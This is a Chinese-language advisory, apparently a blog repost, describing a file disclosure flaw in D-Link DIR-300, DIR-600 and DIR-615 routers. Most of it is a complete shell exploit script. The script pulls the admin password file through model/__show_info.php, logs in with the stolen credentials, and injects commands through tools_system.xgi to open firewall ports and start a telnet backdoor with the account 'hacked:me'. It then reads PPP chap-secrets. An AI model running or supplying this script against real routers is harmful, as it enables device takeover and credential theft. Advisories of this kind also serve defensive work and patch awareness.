showinfo.php,多个D-Link DIR系列路由器'model/__show_info.php'本地文件泄露漏洞

发布日期:2013-12-02

更新日期:2013-12-04

受影响系统:

D-Link DIR-615

D-Link DIR-300

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 64043

D-Link DIR是系列路由器产品。

多个D-Link DIR产品在实现上存在本地文件泄露漏洞,可使攻击者获取敏感信息。

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/bin/sh

if [ -z "$1" ]; then

echo "d-link DIR-300 (all), DIR-600 (all), DIR-615 (fw 4.0)";

echo "exploited by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b";

echo "usage: $0 [router address] [telnet port]";

exit 0;

fi;

if [ -z "$2" ]; then

TPORT=3333;

else

TPORT=$2;

fi

UPORT=31337;

echo "Trying $1 ...";

HTTPASSWD=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd"; | grep -A1 "

" | tail -1 |

sed -e "s/\t//g ; s/^\([^:]*\):\([^:]*\)$/\1\n \2/g"`;

if [ ! -z "$HTTPASSWD" ]; then

L=`echo $HTTPASSWD | cut -d' ' -f1`;

P=`echo $HTTPASSWD | cut -d' ' -f2`;

echo "found username: $L";

echo "found password: $P";

curl -d "ACTION_POST=LOGIN&LOGIN_USER=$L&LOGIN_PASSWD=$P" -sS "http://$1/login.php"; | grep -v "fail"

1>/dev/null;

if [ $? -eq 0 ]; then

curl -sS

"http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i

eth0.2 -p tcp --dport $TPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;

curl -sS

"http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i

eth0.2 -p tcp --dport $UPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;

curl -sS

"http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/telnetd -p $TPORT -l

/usr/sbin/login -u hacked:me&set/runtime/syslog/sendmail=1" 1>/dev/null;

echo "if you are lucky telnet is listening on $TPORT (hacked:me) ..."

curl -sS "http://$1/logout.php"; 1>/dev/null;

fi

fi

CHAP=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets"; | grep -A1 "

" | sed -e

"s/

//g"`;

if [ ! -z "$CHAP" ]; then

echo "found chap-secrets: $CHAP";

fi

echo "Bye bye.";

exit 0;

建议:

--------------------------------------------------------------------------------

厂商补丁:

D-Link

------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

0b1331709591d260c1c78e86d0c51c18.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值